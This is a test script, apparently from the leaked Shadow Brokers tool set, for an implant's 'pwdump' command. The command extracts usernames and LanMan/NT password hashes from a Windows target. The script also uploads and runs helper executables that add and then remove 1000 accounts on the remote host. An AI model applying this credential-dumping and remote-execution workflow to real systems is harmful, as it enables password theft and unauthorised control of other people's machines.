shadowbrokers-exploits/windows/Resources/Ep/Scripts/Pwdump.eps
2017-04-14 11:45:07 +02:00

290 lines
No EOL
7.1 KiB
PostScript

@echo off;
@include "TestIncludes.epm";
bool $rtn = true;
if ("YES" == GetEnv("Target_Win9x")) {
# This command isn't available in 9x environment
return true;
}
echo "---------------------------------------------------------------------------";
echo "PWDUMP Testing";
echo "---------------------------------------------------------------------------";
TestSuccess("pwdump ?", true, $rtn);
TestSuccess("pwdump", true, $rtn);
TestFailure("pwdump -foo", true, $rtn);
TestFailure("pwdump foo", true, $rtn);
int $TestUsers = 1000;
string $BaseUid = "XxTextUser";
int $UserCntBase= 0;
int $UserCntTot = 0;
echo "\n";
echo "---------------------------------------------------------------------------";
echo "PWDUMP - Basic test with existing users";
echo "---------------------------------------------------------------------------";
ifnot(TestScriptVariables($UserCntBase)) /* Basic user test */
{
$rtn = false;
}
else
{
@record on;
if (`getnetaddr`)
{
@record off;
string $localAddr = GetCmdData("local_address");
string $remoteAddr = GetCmdData("remote_address");
ifnot($localAddr == $remoteAddr)
{
#
# Implant running on remote target okay to add extra users
#
echo "\n";
echo "---------------------------------------------------------------------------";
echo "PWDUMP adding $TestUsers test users to remote target($remoteAddr).";
echo "PWDUMP This will take a few minutes to complete.";
echo "---------------------------------------------------------------------------";
ifnot(CreateTestUsers($BaseUid, $TestUsers))
{
$rtn = false;
echo " FAILED - CreateTestUsers failed to add users to target($remoteAddr)";
pause;
}
else
{
echo "---------------------------------------------------------------------------";
echo "PWDUMP - Testing remote target($remoteAddr) after adding $TestUsers users";
echo "---------------------------------------------------------------------------";
ifnot(TestScriptVariables($UserCntTot))
{
$rtn = false;
}
else
{
int $Expectedusers = $UserCntBase;
$Expectedusers += $TestUsers;
if ($UserCntTot != $Expectedusers)
{
$rtn = false;
echo " FAILED - Number of users($UserCntTot) less than extected($Expectedusers).";
pause;
}
}
echo "\n";
echo "---------------------------------------------------------------------------";
echo "PWDUMP removing $TestUsers test users from remote target($remoteAddr)";
echo "PWDUMP This will take a few minutes to complete.";
echo "---------------------------------------------------------------------------";
ifnot(DeleteTestUsers())
{
$rtn = false;
echo " FAILED - DeleteTestUsers failed to delete the testusers from target box";
pause;
}
}
}
else
{
echo "\n";
echo "---------------------------------------------------------------------------";
echo "PWDUMP - CreateTestUsers not run because we are local";
echo "---------------------------------------------------------------------------";
}
}
else
{
@record off;
}
}
return $rtn;
#--------------------------------------------------------------------------
# TestScriptVariables
# Runs pwdump and tests the script variables. Returns the User count.
#
# Params:
# OUT int $userCnt
# Users processed by pwdump
#
#--------------------------------------------------------------------------
sub TestScriptVariables (OUT int $userCnt)
{
bool $subrtn = true;
$userCnt = 0;
echo "PWDUMP Testing SCRIPT VARIABLES";
@record on;
ifnot (`pwdump`)
{
@record off;
$subrtn = false;
echo " FAILED - pwdump failed";
pause;
}
else
{
@record off;
string $Username = GetCmdData("Username");
int $rid = GetCmdData("rid");
string $LanmanHash = GetCmdData("LanmanHash");
string $NtHash = GetCmdData("NtHash");
ifnot (defined($Username))
{
echo " FAILED - Username not defined";
$subrtn = false;
pause;
}
ifnot (defined($rid))
{
echo " FAILED - rid not defined";
$subrtn = false;
pause;
}
ifnot (defined($LanmanHash))
{
echo " FAILED - LanmanHash not defined";
$subrtn = false;
pause;
}
ifnot(defined($NtHash))
{
echo " FAILED - NtHash not defined";
$subrtn = false;
pause;
}
ifnot($subrtn)
{
return $subrtn;
}
if ((sizeof($Username) == sizeof($rid)) &&
(sizeof($Username) == sizeof($LanmanHash)) &&
(sizeof($Username) == sizeof($NtHash)) )
{
$userCnt = sizeof($Username);
echo " PASSED - $userCnt user test";
}
else
{
echo " FAILED - Script variables are not defined.";
$subrtn = false;
pause;
}
}
return $subrtn;
}
#--------------------------------------------------------------------------
# CreateTestUsers
# Adds new users to the target box
#
# Params:
# IN string $BaseUid
# Base userid used for creating the accounts
#
# IN int $users
# Number of users to add to target box
#
#--------------------------------------------------------------------------
sub CreateTestUsers (IN string $BaseUid, IN int $users)
{
bool $subrtn = true;
# see if createusers.exe is already there - temporarily
#------------------------------------------------------
ifnot (`checkfile -name createusers.exe`)
{
ifnot (TestSuccess("put createusers.exe -name createusers.exe", true, $subrtn))
{
echo "Unable to uploaded file createusers.exe";
pause;
return $subrtn;
}
}
# see if addusers.exe is already there - temporarily
#---------------------------------------------------
ifnot (`checkfile -name addusers.exe`)
{
ifnot (TestSuccess("put addusers.exe -name addusers.exe", true, $subrtn))
{
echo "Unable to uploaded file addusers.exe";
pause;
return $subrtn;
}
}
ifnot (TestSuccess("run -command \"createusers.exe $BaseUid $users\" -redirect createusers", true, $subrtn))
{
echo "Unable to run -command createusers.exe xxtestuser $users";
pause;
return $subrtn;
}
ifnot (TestSuccess("run -command \"addusers.exe /c users.txt /p:e\" -redirect addusers", true, $subrtn))
{
echo "Unable to run -command addusers.exe /c users.txt /p:e";
pause;
return $subrtn;
}
return $subrtn;
}
#--------------------------------------------------------------------------
# DeleteTestUsers
# Deletes the new users from the target box
#
# Params:
#
#--------------------------------------------------------------------------
sub DeleteTestUsers ()
{
bool $subrtn = true;
# if users.txt exists then try to remove the users contained within
#------------------------------------------------------------------
if (`checkfile -name users.txt`)
{
ifnot (TestSuccess("run -command \"addusers.exe /e users.txt\" -redirect DeleteTestUsers", true, $subrtn))
{
echo "Unable to run -command addusers.exe /e users.txt";
pause;
}
`del users.txt`;
}
else
{
echo "Unable to find users.txt";
pause;
$subrtn = false;
}
return $subrtn;
}